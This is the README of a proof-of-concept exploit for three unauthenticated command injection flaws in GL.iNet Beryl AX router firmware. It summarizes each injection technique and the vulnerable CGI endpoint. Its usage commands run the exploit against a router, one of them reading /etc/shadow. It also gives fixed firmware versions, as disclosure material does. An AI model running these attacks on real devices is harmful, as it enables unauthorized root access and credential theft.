Exploit for CVE-2026-11450 CVE-2026-11450 CVE-2026-11451 CVE-2026-11452

## https://sploitus.com/exploit?id=F82812B2-209D-560F-A047-2C5FA823E1FD
# GL.iNet Beryl AX Triple RCE PoC

PoC for three unauthenticated command injection vulnerabilities (CVE-2026-11450, CVE-2026-11451, CVE-2026-11452) in the GL.iNet GL-MT3000 (Beryl AX) travel router firmware <= 4.4.5.

Full writeup: https://www.hunt-benito.com/glinet-beryl-ax-triple-rce-cve-2026-11450-11451-11452-unauthenticated-root-on-travel-router/

## Vulnerabilities

| CVE | CVSS | Technique |
|-----|------|-----------|
| CVE-2026-11450 | 7.3 | Buffer size mismatch (0x40 vs 0x100) bypasses `access()` gate, `$()` injected via `system()` |
| CVE-2026-11451 | 7.3 | Single-quote escape in FTP `media_dir` parameter breaks shell quoting |
| CVE-2026-11452 | 7.3 | `$()` command substitution in Samba password parameter inside double-quoted `printf` |

All three exploit the unauthenticated `/cgi-bin/glc` CGI dispatcher which loads plugins via `dlopen`/`dlsym` with no auth or method allowlist.

## Usage

```bash
# Exploit all three CVEs
python3 poc.py http://192.168.8.1

# Exploit a specific CVE
python3 poc.py http://192.168.8.1 -c "id" -v 11450
python3 poc.py https://192.168.8.1 -c "id" -v 11451
python3 poc.py https://192.168.8.1 -c "id" -v 11452

# Custom command and output file
python3 poc.py http://192.168.8.1 -c "cat /etc/shadow" -o /tmp/pwned
```

## Requirements

- Python 3.6+
- Network access to the router's LAN IP (default: 192.168.8.1)
- No credentials required

## Affected Versions

- GL.iNet GL-MT3000 firmware <= 4.4.5
- Fixed in firmware 4.7 (CVE-2026-11450) and 4.8.1 (CVE-2026-11451, CVE-2026-11452)

## Disclaimer

For educational and authorized security research purposes only. Do not use against systems you do not own or have explicit permission to test.